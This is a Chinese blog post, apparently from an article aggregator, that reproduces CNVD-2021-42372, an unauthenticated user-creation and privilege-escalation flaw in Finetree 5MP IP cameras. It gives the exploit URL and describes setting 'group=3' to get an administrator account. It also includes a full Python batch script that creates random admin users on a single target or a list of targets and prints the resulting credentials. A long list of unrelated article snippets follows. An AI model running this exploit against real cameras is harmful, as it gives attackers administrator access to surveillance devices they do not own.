渗透测试小白
渗透测试小白

实战 - Finetree 5MP 摄像机任意用户添加漏洞(CNVD-2021-42372)

文章目录

  • Finetree 5MP 摄像机任意用户添加漏洞
    • 漏洞复现
  • Finetree 5MP 未授权权限提升漏洞
    • 漏洞复现
  • 批量测试POC

EXP:http://ip:port/quicksetup/user_pop.php?method=add

Finetree 5MP 摄像机任意用户添加漏洞

漏洞复现

登录界面

实战 - Finetree 5MP 摄像机任意用户添加漏洞(CNVD-2021-42372)_第1张图片

使用exp,访问未授权的用户添加页面,进行任意用户添加操作,添加会出现报错不用管,直接返回后台登录即可

http://ip:port/quicksetup/user_pop.php?method=add

实战 - Finetree 5MP 摄像机任意用户添加漏洞(CNVD-2021-42372)_第2张图片

实战 - Finetree 5MP 摄像机任意用户添加漏洞(CNVD-2021-42372)_第3张图片

Finetree 5MP 未授权权限提升漏洞

漏洞复现

使用exp添加用户并抓包,修改 ‘group=’ 参数值,放行请求包即可完成低用户提升为管理员用户

group是组,1代表guest,2是operator,3是administrator

实战 - Finetree 5MP 摄像机任意用户添加漏洞(CNVD-2021-42372)_第4张图片

批量测试POC

#!/usr/bin/env python

# -*- conding:utf-8 -*-

# Finetree 5MP 摄像机任意用户添加


import requests

import argparse

import sys

import urllib3

import random

import threading

urllib3.disable_warnings()

  
  

def title():

    print("""

  _____  _   _ __      __ _____           ___    ___   ___   __          _  _    ___   ____   ______  ___  

 / ____|| \ | |\ \    / /|  __ \         |__ \  / _ \ |__ \ /_ |        | || |  |__ \ |___ \ |____  ||__ \

| |     |  \| | \ \  / / | |  | | ______    ) || | | |   ) | | | ______ | || |_    ) |  __) |    / /    ) |

| |     | . ` |  \ \/ /  | |  | ||______|  / / | | | |  / /  | ||______||__   _|  / /  |__ <    / /    / /

| |____ | |\  |   \  /   | |__| |         / /_ | |_| | / /_  | |           | |   / /_  ___) |  / /    / /_

 \_____||_| \_|    \/    |_____/         |____| \___/ |____| |_|           |_|  |____||____/  /_/    |____|

  

                                                                                        Author:Henry4E36

               """)

  
  

class information(object):

    def __init__(self,args):

        self.args = args

        self.url = args.url

        self.file = args.file

  

    def target_url(self):

        payload = self.url + "/quicksetup/user_update.php"

        headers = {

            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",

            "Content-Type": "application/x-www-form-urlencoded"

        }

  

        username = ''.join(random.sample("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",8))

        passwd = ''.join(random.sample("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.1234567890!@#",8))

        data = f"method=add&user={username}&pwd={passwd}&group=3&ptz_enable=0" # 1.访客 2.操作者 3.管理员

        try:

            res = requests.post(url=payload, headers=headers, data=data, verify=False, timeout=5)

            if res.status_code == 200 and "200" in res.text:

                print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在任意用户添加!\033[0m")

                print(f"\033[31m[{chr(8730)}] 用户名: {username} 密码: {passwd} \033[0m")

                print("[" + "-"*100 + "]")

            elif res.status_code == 200 and "804" in res.text:

                print(f"[\033[31mx\033[0m] 目标系统: {self.url} 用户重复!")

                print("[" + "-"*100 + "]")

            elif res.status_code == 200 and "802" in res.text:

                print(f"[\033[31mx\033[0m] 目标系统: {self.url} 用户满了!")

                print("[" + "-"*100 + "]")

            else:

                print(f"[\033[31mx\033[0m]  目标系统: {self.url} 不存在任意用户添加!")

                print("[" + "-"*100 + "]")

        except Exception as e:

            print("[\033[31mX\033[0m]  连接错误!")

            print("[" + "-"*100 + "]")

  
  

    def file_url(self):

        with open(self.file, "r") as urls:

            for url in urls:

                url = url.strip()

                if url[:4] != "http":

                    url = "http://" + url

                self.url = url.strip()

                information.target_url(self)

  
  

if __name__ == "__main__":

    title()

    parser = argparse.ArgumentParser(description='Finetree 5MP 摄像机任意用户添加')

    parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:\"http://127.0.0.1\"")

    parser.add_argument("-f", "--file", metavar="file", help="Targets in file  eg:\"ip.txt\"")

    args = parser.parse_args()

    if len(sys.argv) != 3:

        print(

            "[-]  参数错误!\neg1:>>>python3 CNVD-2021-42372.py -u http://127.0.0.1 \neg2:>>>python3 CNVD-2021-42372 -f ip.txt")

    elif args.url:

        information(args).target_url()

    elif args.file:

        information(args).file_url()

你可能感兴趣的:(python,渗透测试,web安全,安全,网络安全)

  • 云原生环境下的安全控制框架设计 TechVision大咖圈 云原生Kubernetes安全云原生安全安全框架设计零信任微服务安全
    在这个容器满天飞、微服务遍地跑的时代,安全问题就像打地鼠游戏一样,刚按下一个又冒出三个。今天我们来聊聊如何在云原生环境中构建一套靠谱的安全控制框架。文章目录引言:云原生时代的安全新挑战云原生安全面临的核心挑战安全控制框架设计原则框架核心组件详解安全控制策略实施最佳实践与案例分析总结与展望引言:云原生时代的安全新挑战还记得以前那种"铁桶阵"式的安全防护吗?外面围一圈防火墙,里面的服务器老老实实待在机
  • 【AI大模型:架构实战】35、企业级AI中台全链路架构设计与实战指南:从数据管理到智能服务 无心水 人工智能AI大模型系统实战AI大模型高手AI大模型企业落地CSDN技术干货AI中台AI入门
    在企业智能化转型过程中,AI能力的规模化复用与高效管理成为核心挑战。AI中台作为连接技术与业务的桥梁,通过标准化能力输出、集中化资源管控和全链路治理,解决了"重复建设、资源浪费、安全失控"等痛点。本文基于2025年最新实践,详解企业AI中台的架构设计、关键技术实现、落地路径及避坑指南,助力企业构建支撑千级AI应用的"智能中枢"。一、AI中台核心定位与整体架构企业级AI中台并非简单的技术堆砌,而是以
  • Python+requests+pytest接口自动化测试框架的搭建 天才测试猿 python自动化测试软件测试测试用例职场和发展pytest测试工具
    点击文末小卡片,免费获取软件测试全套资料,资料在手,涨薪更快框架的设计思路首先要明确进行接口自动化需要的步骤,如下图所示:然后逐步拆解需要完成的工作:1)了解分析需求:了解接口要实现的功能2)数据准备:根据开发文档确定接口的基本情况,知晓接口的url、请求方式、入参等信息,然后根据业务逻辑以及入参来预期接口的输出需要有一个配置文件来存储接口的一些基本信息;需要有一个方法能读取配置文件;需要有一个e
  • 宝贝的讨价还价 蓝色逍遥398
    2019年1月28日晴星期一“猪爸,我要不要背诵伯父布置的诗啊?”早上九点多,宝贝给我发来微信。昨天,猪媽和我忙完贴墙纸的活儿之后,便带着宝贝和爷爷一起去往伯父家,将宝贝送去伯父家小住几日。这已经成为姐妹俩每逢寒暑假的固定项目,俩小家伙为此都盼着这一刻的到来。因为伯父家在学校里,安全系数相对来说要高,且宝贝和妹妹活动的区域会更广更大,所以猪媽虽然有些不舍,但这可是宝贝盼望的,所以也只能同意。每次去
  • 算力网赋能工业互联网:智能调度与安全融合创新 智能计算研究中心 其他
    内容概要工业互联网的深化发展正面临数据处理效率与系统安全性的双重挑战,而算力网通过技术融合与资源协同,成为破解这一难题的核心路径。当前,工业场景中设备互联规模持续扩大,实时数据流处理需求激增,传统集中式计算架构在响应速度与能耗控制方面显现瓶颈。算力网通过构建智能调度机制,实现任务优先级动态划分与资源弹性分配,在智能检测、故障预测等场景中,将平均响应延迟降低40%以上。行业观察:Gartner研究显
  • 从代码到终端部署:Prompt如何颠覆传统DevOps流程 LCG元 工具运维promptdevops运维
    文章目录基于Prompt工程的DevOps架构重构实践一、架构演进与技术对比1.1架构演进路径1.2核心流程对比二、核心实现方案2.1Prompt解析引擎实现(Python)2.2Kubernetes集成部署(YAML模板)三、生产部署实践3.1安全增强方案3.2性能优化数据四、技术前瞻与演进4.1未来三年技术路线图五、完整技术图谱六、核心代码实现(TypeScript前端)七、部署验证测试基于P
  • 解锁Prompt+DevOps新姿势:终端系统重塑的三大核心策略
    文章目录引言:Prompt驱动的DevOps范式迁移核心策略一:智能决策流水线构建横向架构对比纵向实现流程Python实现示例核心策略二:自适应终端部署体系TypeScript客户端实现YAML部署配置模板核心策略三:智能运维闭环构建安全审计实现方案性能对比分析技术前瞻性分析附录:完整技术图谱技术架构部署验证引言:Prompt驱动的DevOps范式迁移在云原生与AI工程化交汇的今天,Prompt技
  • 高并发解决方案:SpringBoot+Redis分布式缓存实战 fanxbl957 Web缓存springbootredis
    博主介绍:Java、Python、js全栈开发“多面手”,精通多种编程语言和技术,痴迷于人工智能领域。秉持着对技术的热爱与执着,持续探索创新,愿在此分享交流和学习,与大家共进步。DeepSeek-行业融合之万象视界(附实战案例详解100+)全栈开发环境搭建运行攻略:多语言一站式指南(环境搭建+运行+调试+发布+保姆级详解)感兴趣的可以先收藏起来,希望帮助更多的人高并发解决方案:SpringBoot
  • SpringBoot缓存技术全解析:Redis+Caffeine二级缓存架构 fanxbl957 Web缓存springbootredis
    博主介绍:Java、Python、js全栈开发“多面手”,精通多种编程语言和技术,痴迷于人工智能领域。秉持着对技术的热爱与执着,持续探索创新,愿在此分享交流和学习,与大家共进步。DeepSeek-行业融合之万象视界(附实战案例详解100+)全栈开发环境搭建运行攻略:多语言一站式指南(环境搭建+运行+调试+发布+保姆级详解)感兴趣的可以先收藏起来,希望帮助更多的人SpringBoot缓存技术全解析:
  • 后端开发:Spring Boot 的分布式缓存方案 大厂资深架构师 SpringBoot开发实战springboot分布式缓存ai
    后端开发:SpringBoot的分布式缓存方案关键词:SpringBoot、分布式缓存、Redis、Caffeine、缓存策略、缓存失效摘要:本文深入探讨了在SpringBoot后端开发中分布式缓存方案的相关技术。首先介绍了分布式缓存在现代应用中的重要性及本文的研究范围,接着阐述了核心概念如分布式缓存的原理与架构,详细讲解了常用的核心算法原理及具体操作步骤,包括使用Python代码示例说明。通过数
  • 上位机知识篇---Prompt&PowerShell Prompt Atticus-Orion 上位机知识篇promptpowershell
    在Anaconda环境中,AnacondaPrompt和AnacondaPowerShellPrompt是两个常用的命令行工具,它们的核心功能都是为了方便管理Python环境和执行相关命令,但底层依赖的命令行解释器不同,因此在使用场景和语法上存在一些区别。下面详细介绍两者的差异:1.底层依赖的命令行解释器不同这是两者最根本的区别,决定了它们的语法规则和功能范围:AnacondaPrompt基于Wi
  • 边缘计算物联网关如何优化数据处理流程-天拓四方 职业影评人 边缘计算物联网人工智能
    在物联网技术日新月异的今天,数据的产生、传输与处理已成为推动行业智能化转型的关键。边缘计算物联网关,作为这一生态系统中的核心组件,正以其独特的优势,在数据处理效率、实时性、安全性及成本效益等方面展现出非凡的潜力。本文将聚焦于边缘计算物联网关如何优化数据处理流程,深入探讨其技术原理、应用优势及未来发展趋势。一、边缘计算物联网关概述边缘计算物联网关,简而言之,是位于物联网设备边缘,负责数据收集、初步处
  • 物联网安装调试-继电器 速易达网络 物联网技术实训课程物联网
    以下为物联网继电器安装调试的全流程技术指南,涵盖选型、接线、控制逻辑及安全防护,结合工业自动化、智能家居和农业物联三大场景实操方案:一、继电器选型核心参数表参数工业控制智能家居农业物联选型建议负载类型电机/加热管(10-30A)灯具/插座(5-10A)水泵/风机(8-15A)工业选固态继电器(SSR),家居选电磁继电器触点材质银氧化镉(耐电弧)银镍合金(万次寿命)镀金触点(防腐蚀)频繁开关场景用磁
  • virtualenv 小小怪吃吃吃
    virtualenv就是用来为一个应用创建一套“隔离”的Python运行环境。(1)用pip安装virtualenv:pip3installvirtualenv(2)创建开发项目目录:mkdirprojectcdproject/(3)创建一个独立的Python运行环境,命名为venv:virtualenv--no-site-packagesvenv命令virtualenv就可以创建一个独立的Pyt
  • 官网迁移-宝塔面板使用 豆豆_初学者 阿里云腾讯云服务器
    1、华为云购买一塔Ubuntu系统的ECS2、设置NAT网关+安全组,ECS的8888、22和3306端口映射到外网,可访问3、安装宝塔远程工具,连接ECS(密码是在购买ECS是自己设置的密码)4、安装宝塔Linux面板,命令:wget-Oinstall.shhttp://download.bt.cn/install/install-ubuntu_6.0.sh&&sudobashinstall.s
  • SSH 密钥 Honeysea_70 基础知识ssh运维
    什么是SSH密钥SSH密钥就像是你电脑的“身份证”和“钥匙”,用来安全登录另一台电脑(服务器),而不需要每次输入密码。SSH密钥是一种安全登录远程服务器的方式,由一对加密的“钥匙”组成:一个公钥+一个私钥。公钥(可以公开)私钥(必须保密,只保存在你电脑上)原理想象你是远程服务器门口的保安你说:“我每天都要进这栋楼(服务器),但我不想每次都输密码。”于是你用了SSH密钥登录:你把公钥(门锁)装在服务
  • 杏雨海棠 第五章 外婆与杏 书筱筱
    原城的人们,尤其是老人,观念还是趋于传统,他们相信入土为安,新坟起,葬礼毕,留下子孙空怀念。最后的一顿饭,大家讨论最多的就是外婆,而我也是在这顿饭上知道了外婆与杏的故事。外婆叫陈秀芸,1932年出生在原城西北部的一个小村庄,叫南口村。南口村的村民世代务农,守着家门口几亩薄田艰难度日,抗日战争期间,为了女孩子们的安全,父母把她们送到安乐寺里当和尚,也就是因为这个缘故,才有了外婆与杏的故事。外婆当和尚
  • 二供设备运维不再困难,云边一体物联网系统助力水务行业数字化转型
    随着城市边际越来越模糊,城市规模变得越来越大,承载着越来越多人口的生活与工作活动,对于用水、用电、网络、交通等基础民生工程的要求越来越高。二次供水泵站是对高层小区及大型建筑提供用水加压的重要场所。随着二次供水泵站站点越来越多,越来越分散,监控管理设备也愈发困难,对于大量设备的运维工作也十分艰巨,往往只有在出了问题后才能安排人员抢修,严重影响居民用水体验甚至存在安全隐患。针对以上现状,物通博联提供由
  • VSCode使用Jupyter完整指南配置机器学习环境 z日火 校招学习日记vscodejupyter机器学习
    接下来开始机器学习部分第一步配置环境:VSCode使用Jupyter完整指南1.安装必要的扩展打开VSCode,按Ctrl+Shift+X打开扩展市场,搜索并安装以下扩展:必装扩展:Python(Microsoft官方)-Python语言支持Jupyter(Microsoft官方)-Jupyternotebook支持Pylance(Microsoft官方)-Python智能提示和语法检查推荐扩展:
  • API安全:企业数字化转型的隐形炸弹 漠月瑾 代码之外安全API安全网络安全
    API安全:企业数字化转型的隐形炸弹最近看到一份关于企业API安全现状的报告,让我这个IT从业者不禁后背发凉。报告显示,超过80%的企业在使用API处理敏感数据时,安全措施薄弱得令人震惊。这让我意识到,在我们每天依赖的移动应用、云服务和各种数字化工具背后,可能正潜伏着巨大的安全隐患。API:数字化时代的"隐形支柱"作为开发者,我们都知道API(应用程序接口)已经成为现代软件架构的基石。它连接着移动
  • python虚拟环境打包_python项目打包虚拟环境 weixin_39933356 python虚拟环境打包
    python项目打包时,需要将虚拟环境与python自身安装路径下的lib包整合在一起,将该文件保存为packvenv.sh,放入虚拟环境目录下,chmod+xpackvenv.sh,./packvenv.sh执行即可#!/bin/bashPYTHON_PATH=/usr/local/python2.7VENV_PATH=~/.virtualenvs/venv-linux6VENV_NAME=`b
  • python连接数据库的方法,Python 连接数据库的多种方法 AI MIU python连接数据库的方法
    JZGKCHINAPython是一种计算机程序设计语言,它是一种动态的、面向对象的脚本语言。它是一种跨平台的,可以运行在Windows,Mac和Linux/Unix系统上。在日常使用中需要对大量数据进行数据分析,那么就必然用到数据库,我们常用的数据库有SQLServer,MySQL,Oracle,DB2,SQLite,Hive,PostgreSQL,MongoDB还有其他常用的MicrosoftA
  • 八一 一俢
    今天是八一,中国人民解放军92岁生日。他们在战场上抛头颅洒热血冲锋陷阵,他们不惜牺牲自己的生命来捍卫祖国的神圣领土和尊严,我们为他们的刚强、无私、坚韧而感动。我很喜欢看战争题材的电影,在战场上,军人体现出来的那种军魂,有时候的确让人热血沸腾,战争充满了恐慌和牺牲,但是作为一位军人,他会挺起胸膛站在前线,他们虽然表现刚强无谓,但还是会体现出特有的血有肉、有情有义。有军人的地方,会让人感到安全可靠,有
  • pycharm2023,修改文件夹路径,venv解释器无法新增 day_323 pythonpycharm
    pycharm2023,修改文件夹路径,venv解释器无法新增1问题描述2处理方法1问题描述我的pycharm版本为2023.1.2。原有代码所在文件夹路径变更后,再用pycharm打开代码,然后进入setting-pythoninterpreter中,新增venv虚拟环境,pycharm无反应,venv环境一直无法新增。2处理方法1关闭pycharm。然后进入代码文件夹,删除.idea文件夹和v
  • 在幼儿三岁以前,母亲亲自带孩子重要吗? 5239林中漫步
    首先,父母亲无条件的爱和陪伴,是幼小孩子安全感的来源。祖父母能给孩子的爱和从父母那边获得的爱是完全不同的。父母的陪伴对孩子来说非常重要。特别是幼小的孩子,刚出生时,这个世界对他们来说完全是陌生的,得不到父母陪伴,特别是母亲陪伴,孩子将十分失落,感觉不被爱,会缺乏安全感。长此以往,有可能会形成许多性格上的问题。其次在传统的中国家庭,如果不是父母亲自带,孩子就是交给祖父母,祖父母一方面可能会溺爱孩子。
  • python 连接数据库 小鱼拉灯 mysql数据库python
    一.连接MYSQL1.下载PyMySql模块2.在MYSQL中创建数据库并连接importpymysqlconn=pymysql.connect(host='localhost',user='root',password='123456',database='ikun',charset='utf8',port=3306)3.创建表importpymysqlconn=pymysql.connect(
  • 养老院管理系统基于SpringBoot的养老院管理系统系统设计与实现(源码+论文+部署讲解等)
    博主介绍:✌全网粉丝60W+,csdn特邀作者、Java领域优质创作者、csdn/掘金/哔哩哔哩/知乎/道客/小红书等平台优质作者,计算机毕设实战导师,目前专注于大学生项目实战开发,讲解,毕业答疑辅导,欢迎高校老师/同行前辈交流合作✌技术栈范围:SpringBoot、Vue、SSM、Jsp、HLMT、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习、单片机
  • 【开源项目】实测 Google 开源的 AI MCP 数据库网关:10行代码隔离风险,连接池自动复用
    1.引言这两天试了谷歌新开的MCPToolboxforDatabases,它用不到10行代码就能让AI助手(比如LangChain智能体)安全地操作数据库。作为一个常年和数据库连接池、凭证泄露搏斗的开发者,这东西确实解决了我的痛点——把数据库访问抽象成“工具”,通过集中管控的MCPServer隔离风险,还自带性能优化。下面分享实测体验和避坑指南。2.正文2.1核心逻辑:为什么需要MCP?传统AI代
  • F5推出后量子密码学解决方案,助力企业应对新一代安全威胁 CSDN资讯 密码学安全量子计算
    近日,全球领先的应用交付和API安全解决方案提供商F5(NASDAQ:FFIV)宣布推出全新综合性后量子密码学(PQC)就绪解决方案,助力客户应对量子计算带来的网络安全范式变革。该解决方案现已无缝集成至F5应用交付与安全平台(F5ApplicationDeliveryandSecurityPlatform),为企业提供保障应用和API安全所需工具的同时,保持卓越的性能与可扩展性。随着量子时代的到来
  • 智慧水厂怎么建?物联网数据采集+SCADA升级,水务工业智能转型
    在智慧工业与“双碳”目标的双重驱动下,智慧水厂已成为水务行业数字化转型的必选项。通过物联网(IoT)技术实现水厂数据采集的实时化、自动化,不仅能提升供水效率与水质安全,还能降低能耗与运维成本。一、智慧水厂的核心痛点:数据孤岛与效率瓶颈传统水厂依赖人工巡检和分散式监控系统,普遍存在以下问题:1.数据滞后:人工抄表与离线分析导致决策延迟;2.设备盲区:水泵、阀门等关键设备状态无法实时感知;3.能耗浪费
  • 异常的核心类Throwable 无量 java源码异常处理exception
    java异常的核心是Throwable,其他的如Error和Exception都是继承的这个类 里面有个核心参数是detailMessage,记录异常信息,getMessage核心方法,获取这个参数的值,我们可以自己定义自己的异常类,去继承这个Exception就可以了,方法基本上,用父类的构造方法就OK,所以这么看异常是不是很easy package com.natsu;
  • mongoDB 游标(cursor) 实现分页 迭代 开窍的石头 mongodb
    上篇中我们讲了mongoDB 中的查询函数,现在我们讲mongo中如何做分页查询      如何声明一个游标        var mycursor = db.user.find({_id:{$lte:5}});       迭代显示游标数
  • MySQL数据库INNODB 表损坏修复处理过程 0624chenhong tomcatmysql
    最近mysql数据库经常死掉,用命令net stop mysql命令也无法停掉,关闭Tomcat的时候,出现Waiting for N instance(s) to be deallocated 信息。查了下,大概就是程序没有对数据库连接释放,导致Connection泄露了。因为用的是开元集成的平台,内部程序也不可能一下子给改掉的,就验证一下咯。启动Tomcat,用户登录系统,用netstat -
  • 剖析如何与设计人员沟通 不懂事的小屁孩 工作
    最近做图烦死了,不停的改图,改图……。烦,倒不是因为改,而是反反复复的改,人都会死。很多需求人员不知该如何与设计人员沟通,不明白如何使设计人员知道他所要的效果,结果只能是沟通变成了扯淡,改图变成了应付。 那应该如何与设计人员沟通呢? 我认为设计人员与需求人员先天就存在语言障碍。对一个合格的设计人员来说,整天玩的都是点、线、面、配色,哪种构图看起来协调;哪种配色看起来合理心里跟明镜似的,
  • qq空间刷评论工具 换个号韩国红果果 JavaScript
    var a=document.getElementsByClassName('textinput'); var b=[]; for(var m=0;m<a.length;m++){ if(a[m].getAttribute('placeholder')!=null) b.push(a[m]) } var l
  • S2SH整合之session 灵静志远 springAOPstrutssession
    错误信息: Caused by: org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'cartService': Scope 'session' is not active for the current thread; consider defining a scoped
  • xmp标签 a-john 标签
    今天在处理数据的显示上遇到一个问题: var html = '<li><div class="pl-nr"><span class="user-name">' + user + '</span>' + text + '</div></li>'; ulComme
  • Ajax的常用技巧(2)---实现Web页面中的级联菜单 aijuans Ajax
    在网络上显示数据,往往只显示数据中的一部分信息,如文章标题,产品名称等。如果浏览器要查看所有信息,只需点击相关链接即可。在web技术中,可以采用级联菜单完成上述操作。根据用户的选择,动态展开,并显示出对应选项子菜单的内容。 在传统的web实现方式中,一般是在页面初始化时动态获取到服务端数据库中对应的所有子菜单中的信息,放置到页面中对应的位置,然后再结合CSS层叠样式表动态控制对应子菜单的显示或者隐
  • 天-安-门,好高 atongyeye 情感
        我是85后,北漂一族,之前房租1100,因为租房合同到期,再续,房租就要涨150。最近网上新闻,地铁也要涨价。算了一下,涨价之后,每次坐地铁由原来2块变成6块。仅坐地铁费用,一个月就要涨200。内心苦痛。     晚上躺在床上一个人想了很久,很久。        我生在农
  • android 动画 百合不是茶 android透明度平移缩放旋转
    android的动画有两种  tween动画和Frame动画   tween动画;,透明度,缩放,旋转,平移效果   Animation   动画 AlphaAnimation 渐变透明度 RotateAnimation 画面旋转 ScaleAnimation 渐变尺寸缩放 TranslateAnimation 位置移动 Animation
  • 查看本机网络信息的cmd脚本 bijian1013 cmd
    @echo 您的用户名是:%USERDOMAIN%\%username%>"%userprofile%\网络参数.txt" @echo 您的机器名是:%COMPUTERNAME%>>"%userprofile%\网络参数.txt" @echo ___________________>>"%userprofile%\
  • plsql 清除登录过的用户 征客丶 plsql
    tools---preferences----logon history---history  把你想要删除的删除 -------------------------------------------------------------------- 若有其他凝问或文中有错误,请及时向我指出, 我好及时改正,同时也让我们一起进步。 email : binary_spac
  • 【Pig一】Pig入门 bit1129 pig
    Pig安装 1.下载pig   wget http://mirror.bit.edu.cn/apache/pig/pig-0.14.0/pig-0.14.0.tar.gz   2. 解压配置环境变量      如果Pig使用Map/Reduce模式,那么需要在环境变量中,配置HADOOP_HOME环境变量   expor
  • Java 线程同步几种方式 BlueSkator volatilesynchronizedThredLocalReenTranLockConcurrent
    为何要使用同步?      java允许多线程并发控制,当多个线程同时操作一个可共享的资源变量时(如数据的增删改查),      将会导致数据不准确,相互之间产生冲突,因此加入同步锁以避免在该线程没有完成操作之前,被其他线程的调用,      从而保证了该变量的唯一性和准确性。 1.同步方法&
  • StringUtils判断字符串是否为空的方法(转帖) BreakingBad nullStringUtils“”
    转帖地址:http://www.cnblogs.com/shangxiaofei/p/4313111.html   public static boolean isEmpty(String str)     判断某字符串是否为空,为空的标准是 str== null  或 str.length()== 0  
  • 编程之美-分层遍历二叉树 bylijinnan java数据结构算法编程之美
    import java.util.ArrayList; import java.util.LinkedList; import java.util.List; public class LevelTraverseBinaryTree { /** * 编程之美 分层遍历二叉树 * 之前已经用队列实现过二叉树的层次遍历,但这次要求输出换行,因此要
  • jquery取值和ajax提交复习记录 chengxuyuancsdn jquery取值ajax提交
    // 取值 // alert($("input[name='username']").val()); // alert($("input[name='password']").val()); // alert($("input[name='sex']:checked").val()); // alert($("
  • 推荐国产工作流引擎嵌入式公式语法解析器-IK Expression comsci java应用服务器工作Excel嵌入式
    这个开源软件包是国内的一位高手自行研制开发的,正如他所说的一样,我觉得它可以使一个工作流引擎上一个台阶。。。。。。欢迎大家使用,并提出意见和建议。。。 ----------转帖--------------------------------------------------- IK Expression是一个开源的(OpenSource),可扩展的(Extensible),基于java语言
  • 关于系统中使用多个PropertyPlaceholderConfigurer的配置及PropertyOverrideConfigurer daizj spring
    1、PropertyPlaceholderConfigurer Spring中PropertyPlaceholderConfigurer这个类,它是用来解析Java Properties属性文件值,并提供在spring配置期间替换使用属性值。接下来让我们逐渐的深入其配置。 基本的使用方法是:(1) <bean id="propertyConfigurerForWZ&q
  • 二叉树:二叉搜索树 dieslrae 二叉树
        所谓二叉树,就是一个节点最多只能有两个子节点,而二叉搜索树就是一个经典并简单的二叉树.规则是一个节点的左子节点一定比自己小,右子节点一定大于等于自己(当然也可以反过来).在树基本平衡的时候插入,搜索和删除速度都很快,时间复杂度为O(logN).但是,如果插入的是有序的数据,那效率就会变成O(N),在这个时候,树其实变成了一个链表. tree代码:
  • C语言字符串函数大全 dcj3sjt126com cfunction
    C语言字符串函数大全     函数名: stpcpy 功 能: 拷贝一个字符串到另一个 用 法: char *stpcpy(char *destin, char *source); 程序例:   #include <stdio.h> #include <string.h>   int main
  • 友盟统计页面技巧 dcj3sjt126com 技巧
    在基类调用就可以了, 基类ViewController示例代码 -(void)viewWillAppear:(BOOL)animated { [super viewWillAppear:animated]; [MobClick beginLogPageView:[NSString stringWithFormat:@"%@",self.class]];
  • window下在同一台机器上安装多个版本jdk,修改环境变量不生效问题处理办法 flyvszhb javajdk
    window下在同一台机器上安装多个版本jdk,修改环境变量不生效问题处理办法 本机已经安装了jdk1.7,而比较早期的项目需要依赖jdk1.6,于是同时在本机安装了jdk1.6和jdk1.7. 安装jdk1.6前,执行java -version得到 C:\Users\liuxiang2>java -version java version "1.7.0_21&quo
  • Java在创建子类对象的同时会不会创建父类对象 happyqing java创建子类对象父类对象
      1.在thingking in java 的第四版第六章中明确的说了,子类对象中封装了父类对象,   2."When you create an object of the derived class, it contains within it a subobject of the base class. This subobject is the sam
  • 跟我学spring3 目录贴及电子书下载 jinnianshilongnian spring
        一、《跟我学spring3》电子书下载地址: 《跟我学spring3》  (1-7 和 8-13) http://jinnianshilongnian.iteye.com/blog/pdf     跟我学spring3系列 word原版 下载     二、 源代码下载 最新依
  • 第12章 Ajax(上) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • BI and EIM 4.0 at a glance blueoxygen BO
    http://www.sap.com/corporate-en/press.epx?PressID=14787   有机会研究下EIM家族的两个新产品~~~~   New features of the 4.0 releases of BI and EIM solutions include: Real-time in-memory computing –
  • Java线程中yield与join方法的区别 tomcat_oracle java
    长期以来,多线程问题颇为受到面试官的青睐。虽然我个人认为我们当中很少有人能真正获得机会开发复杂的多线程应用(在过去的七年中,我得到了一个机会),但是理解多线程对增加你的信心很有用。之前,我讨论了一个wait()和sleep()方法区别的问题,这一次,我将会讨论join()和yield()方法的区别。坦白的说,实际上我并没有用过其中任何一个方法,所以,如果你感觉有不恰当的地方,请提出讨论。 &nb
  • android Manifest.xml选项 阿尔萨斯 Manifest
    结构 继承关系 public final class Manifest extends Objectjava.lang.Objectandroid.Manifest 内部类 class Manifest.permission权限 class Manifest.permission_group权限组 构造函数 public Manifest () 详细 androi
  • Oracle实现类split函数的方 zhaoshijie oracle
    关键字:Oracle实现类split函数的方 项目里需要保存结构数据,批量传到后他进行保存,为了减小数据量,子集拼装的格式,使用存储过程进行保存。保存的过程中需要对数据解析。但是oracle没有Java中split类似的函数。从网上找了一个,也补全了一下。 CREATE OR REPLACE TYPE t_split_100 IS TABLE OF VARCHAR2(100); cr
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他